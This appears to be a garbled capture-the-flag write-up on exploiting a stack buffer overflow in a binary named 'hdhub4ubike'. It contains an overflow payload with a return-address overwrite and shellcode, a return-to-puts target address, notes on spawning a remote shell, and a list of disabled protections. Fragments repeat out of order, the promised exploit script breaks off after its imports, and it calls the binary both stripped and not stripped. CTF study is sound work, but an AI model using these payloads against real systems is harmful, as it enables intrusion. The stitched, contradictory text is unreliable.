puts(flag); return 0;
The goal is to obtain the flag without knowing the correct key. 2.1 File information $ file hdhub4ubike hdhub4ubike: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped, for GNU/Linux 3.2.0, BuildID[sha1]=...
// compare with a secret stored in the .rodata section if (strcmp(key, secret_key) != 0) return 0; hdhub4ubike
// vulnerable read – no length limit! read(0, buf, 0x100); // <‑‑ overflow possible
payload = b'A'*64 + b'B'*8 + struct.pack("<Q", 0x7fffffffe000) # address of our buffer (approx) payload = payload.ljust(0x100, b'\x90') + shellcode Running the payload spawns an interactive shell on the remote target. | Topic | What we observed in hdhub4ubike | |---------------------------|-----------------------------------| | Stack overflow | read with a length far larger than the buffer → classic overflow vector. | | Non‑PIE binaries | Fixed addresses make ROP/simple return‑to‑code trivial. | | NX disabled | Allows injection of raw shellcode on the stack. | | No canary / RELRO | Nothing blocks overwriting the saved RIP. | | Info leakage | The flag was embedded in the binary – a “cheat” that encourages bypassing logic checks. | | Best exploitation path | Return‑to‑existing puts that already has the flag address set → shortest payload, no need for ROP chain or shellcode. | 6️⃣ Full Exploit Script (Python 3) #!/usr/bin/env python3 import struct, pexpect, sys puts(flag); return 0; The goal is to obtain
$ ./hdhub4ubike === Welcome to the HD Bike Hub === Enter your hub key: Static analysis quickly reveals that the binary is stripped (no symbols) and that it is compiled with , -z execstack , and -no-pie – classic “easy pwn” settings.
BIN = "./hdhub4ubike" TARGET_ADDR = 0x004011a6 # address of the "puts" call that prints the flag read(0, buf, 0x100); // <‑‑ overflow possible payload
=== Welcome to the HD Bike Hub === Enter your hub key: flagh0p3_y0u_f0und_th3_h1d3_b1k3 Success! The flag is printed without ever passing the check_key test. If you prefer a “classic” shellcode approach, you can place a /bin/sh payload on the stack and return to it.